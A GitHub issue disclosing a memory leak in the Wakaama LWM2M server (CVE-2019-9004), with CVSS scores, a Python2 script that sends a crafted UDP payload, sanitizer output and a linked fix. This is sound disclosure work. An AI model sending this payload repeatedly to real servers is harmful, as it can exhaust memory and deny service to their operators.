Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Memory leak while processing crafted packet #425

Closed
cve-reporting opened this issue Feb 18, 2019 · 1 comment

Comments

Projects
None yet
1 participant
@cve-reporting
Copy link

commented Feb 18, 2019

Wakaama LWM2M server incorrectly handles incoming packets leading to a memory leak.
Processing of the single crafted packet leads to leaking (wasting) 24 bytes of memory.
This can lead to stopping of the LWM2M server after exhausting all available memory.
Depending on server configuration and isolation of services, this can stop also other processes on the same server.

Proposed CVSS 3.0 Score:

On systems with modern memory protection and isolation of services:
5.3 (medium) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

On systems with lower memory protection and no isolation of services:
7.5 (high) - CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Reproduction:

  1. Wakaama must be compiled with Leak Sanitizer (or other similar tool) by setting compilation flag:
    C_FLAGS = -fsanitize=address

  2. Run Wakaama server as:
    lwm2mserver -4 -l 55555

  3. Run following Python2 script (running multiple times will show larger leak):


    import sys
    import socket

    WAKAAMA_PAYLOAD = "4402e6e2e2e68167b2726411"
    out_data = WAKAAMA_PAYLOAD.decode('hex')
    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM )
    s.sendto(out_data, (sys.argv[1], int(sys.argv[2])))


    Execution of the script:

    python2 wakaama_test.py dst_ip dst_port
    (where: dst_ip and dst_port are IP and port of tested Wakaama server)
    e.g.:
    sudo python wakaama_test.py 192.168.0.101 55555

  4. Close the lwm2mserver to get report from Leak Sanitizer:

    12 bytes received from [....]:....
    44 02 E6 E2 E2 E6 81 67 B2 72 64 11 D......g.rd.
    ^C
    =================================================================
    ==19153==ERROR: LeakSanitizer: detected memory leaks

    Direct leak of 24 byte(s) in 1 object(s) allocated from:
    #0 0x7f4fa293b602 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98602)
    #1 0x42f1df in lwm2m_malloc (/wakaama-master/build_asan/lwm2mserver+0x42f1df)
    #2 0x425ad6 in coap_add_multi_option (/wakaama-master/build_asan/lwm2mserver+0x425ad6)
    #3 0x42910f in coap_parse_message (/wakaama-master/build_asan/lwm2mserver+0x42910f)
    #4 0x412aac in lwm2m_handle_packet (/wakaama-master/build_asan/lwm2mserver+0x412aac)
    #5 0x4088e2 in main (/wakaama-master/build_asan/lwm2mserver+0x4088e2)
    #6 0x7f4fa24f982f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)

    SUMMARY: AddressSanitizer: 24 byte(s) leaked in 1 allocation(s).

sbertin-telular added a commit to sbertin-telular/wakaama that referenced this issue Feb 18, 2019

Fix memory leak with bad options.
Option processing can allocate memory. Encountering a bad option was
returning and error without freeing that memory. This adds the necessary
calls to free the memory to fix eclipse#425.

Signed-off-by: Scott Bertin <sbertin@telular.com>

@dnav dnav closed this in #426 Feb 19, 2019

@cve-reporting

This comment has been minimized.

Copy link
Author

commented Feb 25, 2019

For this vulnerability following ID was assigned: CVE-2019-9004

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.